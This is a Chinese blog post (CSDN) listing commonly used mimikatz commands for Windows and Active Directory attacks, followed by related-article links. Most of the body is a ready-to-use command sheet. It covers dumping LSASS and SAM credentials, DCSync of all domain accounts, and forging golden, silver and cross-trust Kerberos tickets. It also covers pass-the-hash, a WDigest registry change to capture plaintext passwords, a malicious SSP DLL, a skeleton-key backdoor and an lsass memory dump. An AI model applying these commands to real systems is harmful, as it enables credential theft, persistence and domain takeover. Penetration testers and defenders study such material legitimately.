mimikatz常用命令总结

已于 2022-04-28 12:20:51 修改
阅读量10w+ 收藏 18
点赞数 5
分类专栏: 其他 密码破解 渗透测试基础知识 文章标签: 安全
于 2020-08-27 18:19:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/108266353
版权

文章目录

前言

在管理员权限下使用,如果没有管理员权限,基本每个功能都无法正常使用,切记。

命令

补充:
::命令可以查看帮助信息
在这里插入图片描述

普通管理员权限可以执行的命令(密码查询与权限检测与日志记录)

lsadump::lsa /inject 查看ntds.dit与sam文件的信息,如果没有查看ntds.dit的就只查看sam
在这里插入图片描述

privilege::debug 打开第一个命令,且必须执行。
log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。
在这里插入图片描述
sekurlsa::logonpasswords 列出已登陆用户的密码(比较常用)
在这里插入图片描述

域控权限才能执行的命令

lsadump::dcsync /domain:test.com /user:krbtgt 输出指定用户的密码信息

lsadump::dcsync /domain:test.com /all /csv 列出域内所有用户的账号密码
在这里插入图片描述

黄金票据相关

清除与查询票据信息

kerberos::list 列出说所有票据
kerberos::purge 删除所有票据
在这里插入图片描述
sekurlsa::kerberos 列出已被验证的kerberos凭证(几乎没用过且只能在域内使用)
在这里插入图片描述
sekurlsa::tickets /export 列出所有票据(基本没用过且只能在域内用)
在这里插入图片描述

制作票据

使用nthash制作票据

kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi

使用krbtgt的hash值:

kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi

使用krbtgt的aes256值:

kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi

pth攻击:

sekurlsa::pth /user:Administrator /domain:test.com /ntlm:3dbde697d71690a769204beb12283678
lsadump::dcsync /domain:test.com /all /csv

加载票据到缓存

kerberos::ptt 1.kirbi

破解sam文件

lsadump::sam /sam:sam.hiv /system:system.hiv

明文密码抓取

读取windows明文密码思路

1.修改注册表让mimikatz可以读取明文密码,然后使用cmd锁屏让用户重新登陆。
#开启wdigest Auth读取明文密码

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

#强制锁屏

rundll32 user32.dll,LockWorkStation

#读取密码

mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit
type mimikatz.log | find /i "password"

在这里插入图片描述

在这里插入图片描述

2.使用mimikatz的ssp,然后使用cmd让屏幕锁屏。

copy mimilib1.dll C:\Windows\System32\

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "C:\Windows\System32\mimilib1.dll" /t REG_MULTI_SZ /

mimikatz.exe privilege::debug misc::memssp exit

rundll32 user32.dll,LockWorkStation


type C:\Windows\System32\mimilsa.log

在这里插入图片描述

制作白银票据

kerberos::golden /user:administrator /domain:wlaq.com /sid:S-1-5-21-4207138187-2036730068-1601168572 /target:dc01.wlaq.com /rc4:a5974b890979d0d0ff123262b14449d1 /service:cifs /ptt

制作一个跨信任域的黄金票据

  1. 当前域的krbtgt密码
  2. Enterprise Admins组任意用户的sid
  3. 域之间互相信任。
  4. 当前域的sid。
mimikatz.exe "kerberos::golden /user:anyusername sids:[EA组的sid] /sid:[lab.adsec.com域的sid] /domain:lab.adsec.com /krbtgt:16ed27ee7848756cfa96b33c25e3ad3d /ptt" exit

Get-ADGroup -Identity “Enterprise Admins” #查询EA组的sid

#查询域内所有的组
ldapsearch -LLL -x -H ldap://172.24.6.11:389 -D “username” -w “password” -b CN=Users,DC=first,DC=test,DC=com “(objectClass=group)”|grep “sAMAccountName”

#查准Enterprise Admins组中有谁
ldapsearch -LLL -x -H ldap://172.24.6.11:389 -D “username” -w “password” -b CN=“Enterprise Admins”,CN=Users,DC=first,DC=test,DC=com | grep “member”

#查询组内用户的sid

ldapsearch -LLL -x -H ldap://172.24.6.11:389 -D “username” -w “password” -b "CN=Administrator,CN=Users,DC=first,DC=test,DC=com " | grep objectSid
这个查出来的是乱码,看似是base64但是无法解密。

可以使用powerview或者adfind获取用户的sid。

使用skeleton key进行权限维持与恢复cmd禁用

1.skeleton key设置,这样子域内任意用户相当于都有了双重密码,除原密码外,mimikatz这个密码也可以进行登录。

privilege::debug
misc::skeleton

2.恢复被禁用的cmd等命令
有时候域管理员会禁用cmd等命令,这时候我们可以使用mimikatz进行恢复

privilege::debug
misc::cmd
misc::regedit
misc::taskmgr

补充

procdump

#拉出lsass的内存并保存成文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp

#破解内存中的密码
sekurlsa::minidump lass.dmp
sekurlsa::logonpasswords

参考文章

参考
mimikatz使用方法
mimikatz明文密码抓取

Shanfenglan7
关注
专栏目录
内网渗透,横向移动总结mimikatz域控)
墨痕诉清风的博客
08-23 2976
前言 通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
常用mimikatz命令合集
03-08
这是我平时使用时觉得最常用的一些命令合集,希望可以帮到大家.
mimikatz常见命令
G3et的博客
01-29 1548
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
萌新如何玩转mimikatz
最新发布
Python单行客的博客
08-07 1068
萌新如何玩转mimikatz
Mimikatz 命令
weixin_45682070的博客
06-04 397
最流行的 Mimikatz 命令 CRYPTO::Certificates – 列出/导出凭证 KERBEROS::Golden – 创建黄金票证/白银票证/信任票证 KERBEROS::List – 列出在用户的内存中所有用户的票证(TGT 和 TGS)。不需要特殊的权限,因为它仅显示当前用户的票证。与 “klist” 的功能相似。 KERBEROS::PTT – 票证传递。通常用于注入窃取或伪造的 Kerberos 票证(黄金票证/白银票证/信任票证)。 LSADUMP::DCSync – 向 DC 发
mimikatz使用详解
qq_59468567的博客
04-12 584
该模块是用于提权的模块,很多模块需要高权限运行,所以要先进行提权,只能用具有管理员权限的命令行窗口才可以执行成功,普通用户使用提权命令会失败。其中常用的是privilege、sekurlsa、kerberos、lsadump、token、sid模块。改模块是对Local Security Authiruty(LSA)进行密码抓取的模块。使用该模块需要高权限,因此需要执行提权命令,如下是常用命令。该模块是与Kerberos相关的模块。• privilege 提权模块。• kerberos包模块。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 7万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
域渗透常用命令
神隐哥的博客
03-02 1567
信息搜集 net view /domain:XXX 查看XXX域中的机器列表 net view /domain 查看内网中有多少个域 setspn -T jumbolab.com -Q */* 快速寻找内网中注册的服务 net user /domain 查看域用户 net group "domain admins" /domain 查看域管 net time /domain 定位域控。也可以通过ipconfig /all。一般DNS就是域控 nltest /domain_trusts 列出域信任关系 c
hw面试题,网络安全服务面试题,78页,近三万字,纯手工总结
06-27
- **常用命令**: `psexec`、`wmic`、`smbexec`、`winrm`、`net use`等用于实现共享、计划任务等功能。 - **差异性**: `psexec`记录较多日志,而`wmic`则相对隐蔽。 #### 二、Kerberos认证机制与攻击手法 **1. ...
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1415
内网环境下的横向移动总结
mimikatz
s0mor
09-10 683
mimikatz已集成到metasploit中 需要SYSTEM权限 查看权限: getuid 若不是SYSTEM权限: getsystem 载入mimikatz load mimikatz 抓密码 mimikatz_command -f samdump::hashes MD5解密就行了 ...
Mimikatz使用方法
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1987
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
Mimikatz 使用小技巧
大方子
10-05 2695
1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::debug"" &quo
windows Mimikatz使用方法
weixin_30657999的博客
02-21 718
Windows - Mimikatz Mimikatz - Execute commands Only one command PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit Mimikatz console (multiple commands) ...
技术分享 | mimikatz的常见使用方法
Uguardsec的博客
08-10 3235
0x00简介 Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就
法国大面包mimikatz使用方法
weixin_43534549的博客
05-12 1142
该工具可以让我们获取到Windows系统密码的明码 运行软件后,输入两条命令: 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 使用小技巧: 1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords ...
mimipenguin以及mimikatz神器的使用。
max_ss的专栏
11-15 3841
参考:http://www.4hou.com/info/news/4213.html 1. mimipenguin 下载: https://github.com/huntergregal/mimipenguin os:kali-linux 必须是root权限 下载后进入目录直接运行  ./mimipenguin  即可;然后直接得到账号密码信息。   2.mimikatz 下载...
mimikatz排查
07-30
Mimikatz是一款小巧而强大的Windows密码提取工具,它主要用于检测和提取系统中的各种凭据信息,如SAM哈希、Lsa Secrets、TGT令牌等,通常用于安全审计、取证分析和漏洞评估场景。如果你遇到疑似Mimikatz活动的问题,排查过程可能包括以下几个步骤: 1. **识别迹象**:检查日志文件(事件查看器、系统日志、安全日志),特别是那些包含异常登录尝试、未知程序访问敏感资源或系统进程异常的行为。 2. **系统权限**:确认是否有未经授权的账户进行了此类操作,或者是否存在rootkit活动隐藏的痕迹。 3. **网络流量监控**:通过Wireshark或其他网络嗅探工具分析,看是否发现Mimikatz特有的通信模式,比如与共享内存、Named Pipe或RPC的连接。 4. **文件检查**:搜索系统目录和可疑进程的临时文件夹,查找Mimikatz的二进制文件或输出的日志。 5. **使用工具反查**:利用像Volatility这样的内存分析工具,对内存快照进行分析,寻找Mimikatz运行过的证据。 6. **系统更新和补丁**:确保系统的安全补丁是最新的,因为Mimikatz可能会利用已知漏洞进行攻击。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值